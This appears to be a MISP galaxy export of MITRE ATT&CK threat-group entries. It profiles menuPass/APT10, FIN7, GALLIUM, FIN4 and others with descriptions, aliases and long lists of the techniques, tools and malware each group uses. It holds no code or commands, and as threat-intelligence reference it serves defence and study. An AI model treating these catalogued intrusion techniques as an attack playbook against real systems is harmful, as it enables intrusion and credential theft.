- uses: *misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-tool="Windows Credential Editor - S0005" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-malware="ASPXSpy - S0073" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="Remexi - S0375" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="External Proxy - T1090.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="pwdump - S0006" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="Cadelspy - S0454" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="MechaFlounder - S0459" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="CrackMapExec - S0488" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1056" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="FTP - S0095" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="NBTscan - S0590" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1546.010" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets">https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets</a></td>
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</table>
SilverTerrier - G0083

[SilverTerrier](https://attack.mitre.org/groups/G0083) is a Nigerian threat group that has been seen active since 2014. [SilverTerrier](https://attack.mitre.org/groups/G0083) mainly targets organizations in high technology, higher education, and manufacturing.(Citation: Unit42 SilverTerrier 2018)(Citation: Unit42 SilverTerrier 2016)

The tag is: *misp-galaxy:mitre-intrusion-set=*"SilverTerrier - G0083"

SilverTerrier - G0083 is also known as:

- SilverTerrier

SilverTerrier - G0083 has relationships with:

- uses: misp-galaxy:mitre-malware="NETWIRE - S0198" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="NanoCore - S0336" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="DarkComet - S0334" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="Lokibot - S0447" with estimative-language:likelihood-probability="almost-certain"

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GALLIUM - G0093

[GALLIUM](https://attack.mitre.org/groups/G0093) is a group that has been active since at least 2012, primarily targeting high-profile telecommunications networks. [GALLIUM](https://attack.mitre.org/groups/G0093) has been identified in some reporting as likely a Chinese state-sponsored group, based in part on tools used and TTPs commonly associated with Chinese threat actors.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)

The tag is: `misp-galaxy:mitre-intrusion-set="GALLIUM - G0093"`

GALLIUM - G0093 is also known as:

- GALLIUM
- Operation Soft Cell

GALLIUM - G0093 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Domain Account - T1136.002"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="Reg - S0075" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="China Chopper - S0020" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="Ping - S0097" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="HTRAN - S0040" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="at - S0110" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="External Proxy - T1090.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="PlugX - S0013" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="ipconfig - S0100" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="cmd - S0106" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="Windows Credential Editor - S0005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="BlackMould - S0564" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="NBTscan - S0590" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Server - T1583.004" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/">https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/</a></td>
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Suckfly - G0039

[Suckfly](https://attack.mitre.org/groups/G0039) is a China-based threat group that has been active since at least 2014. (Citation: Symantec Suckfly March 2016)

The tag is: misp-galaxy:mitre-intrusion-set="Suckfly - G0039"

Suckfly - G0039 is also known as:
• Suckfly

Suckfly - G0039 has relationships with:

• similar: misp-galaxy:threat-actor="Suckfly" with estimative-language:likelihood-probability="likely"

• uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="Nidiran - S0118" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"


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<td><a href="http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates">http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates</a></td>
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</table>

FIN4 - G0085

[FIN4](https://attack.mitre.org/groups/G0085) is a financially-motivated threat group that has targeted confidential information related to the public financial market, particularly regarding healthcare and pharmaceutical companies, since at least 2013. (Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye FIN4 Stealing Insider NOV 2014) (FIN4) is unique in that they do not infect victims with typical persistent malware, but rather they focus on capturing credentials authorized to access email and other non-public correspondence. (Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)

The tag is: misp-galaxy:mitre-intrusion-set="FIN4 - G0085"

FIN4 - G0085 is also known as:

• FIN4

FIN4 - G0085 has relationships with:
• uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="GUI Input Capture - T1056.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1565.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"

Table 4358. Table References

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<tr>
<td><a href="https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html">https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html</a></td>
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**menuPass - G0045**

[menuPass](https://attack.mitre.org/groups/G0045) is a threat group that has been active since at least 2006. Individual members of [menuPass](https://attack.mitre.org/groups/G0045) are known to have acted in association with the Chinese Ministry of State Security's (MSS) Tianjin State Security Bureau and worked for the Huaying Haitai Science and Technology Development Company.(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)
menuPass has targeted healthcare, defense, aerospace, finance, maritime, biotechnology, energy, and government sectors globally, with an emphasis on Japanese organizations. In 2016 and 2017, the group is known to have targeted managed IT service providers (MSPs), manufacturing and mining companies, and a university.(Citation: Palo Alto menuPass Feb 2017)(Citation: Crowdstrike CrowdCast Oct 2013)(Citation: FireEye Poison Ivy)(Citation: PWC Cloud Hopper April 2017)(Citation: FireEye APT10 April 2017)(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)

The tag is: misp-galaxy:mitre-intrusion-set="menuPass - G0045"

menuPass - G0045 is also known as:

- menuPass
- Cicada
- POTASSIUM
- Stone Panda
- APT10
- Red Apollo
- CVNX
- HOGFISH

menuPass - G0045 has relationships with:

- similar: misp-galaxy:threat-actor="Stone Panda" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="External Proxy - T1090.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="PowerSploit - S0194" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Trusted Relationship - T1199" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="certutil - S0160" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="pwdump - S0006" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="SNUGRIDE - S0159" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="UPPERCUT - S0275" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="Ping - S0097" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="cmd - S0106" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="PlugX - S0013" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="Impacket - S0357" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="ChChes - S0144" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="RedLeaves - S0153" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="EvilGrab - S0152" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="QuasarRAT - S0262" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="esentutl - S0404" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Remote Data Staging - T1074.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="InstallUtil - T1218.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Fast Flux DNS - T1568.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="AdFind - S0552" with estimative-language:likelihood-probability="almost-certain"

Table 4359. Table References

Links

https://attack.mitre.org/groups/G0045
https://www.justice.gov/opa/page/file/1122671/download
https://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem
https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html
Sowbug - G0054

[Sowbug](https://attack.mitre.org/groups/G0054) is a threat group that has conducted targeted attacks against organizations in South America and Southeast Asia, particularly government entities, since at least 2015. (Citation: Symantec Sowbug Nov 2017)

The tag is: *misp-galaxy:mitre-intrusion-set="Sowbug - G0054"

Sowbug - G0054 is also known as:

- Sowbug

Sowbug - G0054 has relationships with:

- similar: *misp-galaxy:threat-actor="Sowbug" with estimative-language:likelihood-probability="likely"
- uses: *misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-malware="Starloader - S0188" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-malware="Felismus - S0171" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
FIN7 - G0046

[FIN7](https://attack.mitre.org/groups/G0046) is a financially-motivated threat group that has primarily targeted the U.S. retail, restaurant, and hospitality sectors since mid-2015. They often use point-of-sale malware. A portion of [FIN7](https://attack.mitre.org/groups/G0046) was run out of a front company called Combi Security. [FIN7](https://attack.mitre.org/groups/G0046) is sometimes referred to as [Carbanak](https://attack.mitre.org/software/S0030) Group, but these appear to be two groups using the same [Carbanak](https://attack.mitre.org/software/S0030) malware and are therefore tracked separately. (Citation: FireEye FIN7 March 2017) (Citation: FireEye FIN7 April 2017) (Citation: FireEye CARBANAK June 2017) (Citation: FireEye FIN7 Aug 2018)

The tag is: *misp-galaxy:mitre-intrusion-set="FIN7 - G0046"

FIN7 - G0046 is also known as:

- FIN7

FIN7 - G0046 has relationships with:

- similar: *misp-galaxy:threat-actor="FIN7"* with *estimative-language:likelihood-probability="likely"
- uses: *misp-galaxy:mitre-attack-pattern="Video Capture - T1125"* with *estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004"* with *estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002"* with *estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001"* with *estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="DNS - T1071.004"* with *estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="POWERSOURCE - S0145" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="Carbanak - S0030" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="HALFBAKED - S0151" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="TEXTMATE - S0146" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="User Activity Based Checks - T1497.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="SQLRat - S0390" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="RDFSNIFFER - S0416" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="BOOSTWRITE - S0415" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="GRIFFON - S0417" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-malware="Pillowmint - S0517" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Malware - T1587.001" with estimative-language:likelihood-probability="almost-certain"

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</table>

### Gallmaker - G0084

[Gallmaker](https://attack.mitre.org/groups/G0084) is a cyberespionage group that has targeted victims in the Middle East and has been active since at least December 2017. The group has mainly targeted victims in the defense, military, and government sectors. (Citation: Symantec Gallmaker Oct 2018)

The tag is: `misp-galaxy:mitre-intrusion-set="Gallmaker - G0084"`

Gallmaker - G0084 is also known as:

- Gallmaker

Gallmaker - G0084 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

